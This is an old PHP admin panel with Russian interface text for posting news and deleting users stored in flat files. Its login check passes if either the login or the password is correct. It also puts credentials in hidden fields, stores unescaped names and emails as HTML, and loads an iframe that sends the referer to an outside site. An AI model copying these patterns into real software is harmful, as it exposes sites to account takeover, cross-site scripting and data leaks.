<?
require "settings.php";
if ($login != "$adminlogin" && $password != "$adminpassword") { print "<BR><BR><CENTER><h1>== INCORRECT LOGIN OR PASSWORD == <BR><FONT COLOR=FFFFFF STYLE='BACKGROUND: RED;'>ACCESS DENIED!</h1>

<br><br><form>
<br>L:<input type=text name=login>
<br>P:<input type=password name=password>
<br><input type=submit>
</form>"; exit; }

switch($deystvo) :


case("news") :
print "
<form action=admin.php?deystvo=news2 method=post>
<input type=hidden name=login value=$login>
<input type=hidden name=password value=$password>
<center><b>Добавить новость:</b><br><br>
<textarea cols=40 rows=5 size=100 name=text></textarea><br>
<input type=submit  value='             Добавить новость             '>
</form>
";
break;
case("news2") : 

$dat = date("d.m.Y");
$text = htmlspecialchars($text);
$text = str_replace("\r\n", "<br>", $text);

print "<h1>Новость размещена!";



if ($name != "") { $tteexxtt = "$dat|$text|<a href='mailto:$email'>$name</a>|<a href='admins.php?admin=$login'>$login</a>"; }
else { $tteexxtt = "$dat|$text|<a href='admins.php?admin=$login'>$login</a>|"; }
$fp=fopen("news.txt","a");
fputs($fp,"$tteexxtt\r\n");
fclose($fp);
break;
case("guest") :
print "<b>Убить выделенных юзеров:</b><br>
<form action=admin.php?deystvo=guestkill method=post>
<input type=hidden name=login value=$login>
<input type=hidden name=password value=$password>
      ";
  $n = "0";
  $g = "0";
          $fill="users.data";
          $test = file("$fill");

      $size = sizeof($test);
$num = $size;  
                        do { 
               //                   $data = explode("|", $test[$num]);   
               //                   $data[1] = stripslashes($data[1]);
$text = substr($test[$n],0,90);
$text = str_replace("<", "", $text);
print "<li> <input type=checkbox name=kill[$n]>   $text

       ";

$g++;   
$num--; 
$n++;

                     } while ($n-1 < "$size");
print "<br><input type=submit value='      kill selected!     '></form>";
break;

case("guestkill") :
 $n = "0";
  $g = "0";
          $fill="users.data";
          $test = file("$fill");

      $size = sizeof($test);
$num = $size;  
                        do { 

if ($kill[$n] == "on") { $sniffkill .= "$test[$n]"; $test[$n] = ""; }

$g++;   
$num--; 
$n++;

                     } while ($n-1 < "$size");

$n = "0";                          do {
$array .= "$test[$n]";
         $n++;                        } while ($n < $size);
        $fh = fopen("users.data", "w");          
        $ee = fputs($fh, "$array");      
        fclose($fh);
print "Юзер(ы) удален(ы)!       <br><font color=red>ЖМИ кнопку назад браузера!</font>";



break;








default :
 print "<title>AdMiN</title>
<center><h1>Admin.Interface</h1><br><br>


</form> 
<form action=admin.php?deystvo=news method=post>
<input type=hidden name=login value=$login>
<input type=hidden name=password value=$password><center>
<input type=submit value='         Добавить новость         '>
</form> 
<form action=admin.php?deystvo=guest method=post>
<input type=hidden name=login value=$login>
<input type=hidden name=password value=$password><center>
<input type=submit value='       Убить юзера\юзеров      '>
</form> 
<br>
<br><br><br><br>
<hr size=1>
Админ.Интерфейс только с виду кривой :) Я никогда не уделял должного внимания админ.интерфейсам, слишком мало народу их видит...
<hr size=1>


<iframe width=100% height=50 frameborder=no src=\"http://club.lyanguzov.inc.ru/script.php?url=$HTTP_REFERER\"></iframe>
       ";

  
break;
endswitch;
?>